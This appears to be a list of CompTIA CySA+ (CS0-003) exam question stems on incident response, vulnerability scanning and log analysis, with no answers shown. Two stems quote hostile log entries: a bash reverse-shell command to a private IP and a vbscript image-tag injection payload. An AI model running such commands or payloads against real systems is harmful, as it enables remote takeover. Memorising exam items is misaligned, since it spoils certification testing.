COMPTIA-CYSA

CompTIA's CS0-003 An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?

CompTIA's CS0-003 An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?

CompTIA's CS0-003 A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?

CompTIA's CS0-003 While reviewing web server logs, a security analyst found the following line:< IMG SRC='vbscript:msgbox("test")' >Which of the following malicious activities was attempted?

CompTIA's CS0-003 A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://office365password.acme.co. The site’s standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?

CompTIA's CS0-003 A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?

CompTIA's CS0-003 A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?

CompTIA's CS0-003 A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?

CompTIA's CS0-003 A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?

CompTIA's CS0-003 An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?

CompTIA's CS0-003 An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?

CompTIA's CS0-003 An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst’s concern?

CompTIA's CS0-003 Which of the following describes the best reason for conducting a root cause analysis?

CompTIA's CS0-003 Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?

CompTIA's CS0-003 A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device’s operating system. Which of the following best meets this requirement?

CompTIA's CS0-003 A security analyst identified the following suspicious entry on the host-based IDS logs:bash -i >& /dev/tcp/10.1.2.3/8080 0>&1Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

CompTIA's CS0-003 A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?

CompTIA's CS0-003 A security analyst is reviewing the findings of the latest vulnerability report for a company’s web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?

CompTIA's CS0-003 A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?

CompTIA's CS0-003 A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?

CompTIA's CS0-003 A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:Which of the following vulnerability types is the security analyst validating?

CompTIA's CS0-003 Which of the following is the most important factor to ensure accurate incident response reporting?

CompTIA's CS0-003 A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?

CompTIA's CS0-003 A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?

CompTIA's CS0-003 A security analyst must review a suspicious email to determine its legitimacy. Which of the following should be performed? (Choose two.) E. Evaluate the HELO or EHLO string of the connecting email server F. Examine the SPF, DKIM, and DMARC fields from the original email

CompTIA's CS0-003 A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?

CompTIA's CS0-003 A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?

CompTIA's CS0-003 Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?

CompTIA's CS0-003 An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that could reduce the impact of this situation?

CompTIA's CS0-003 A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?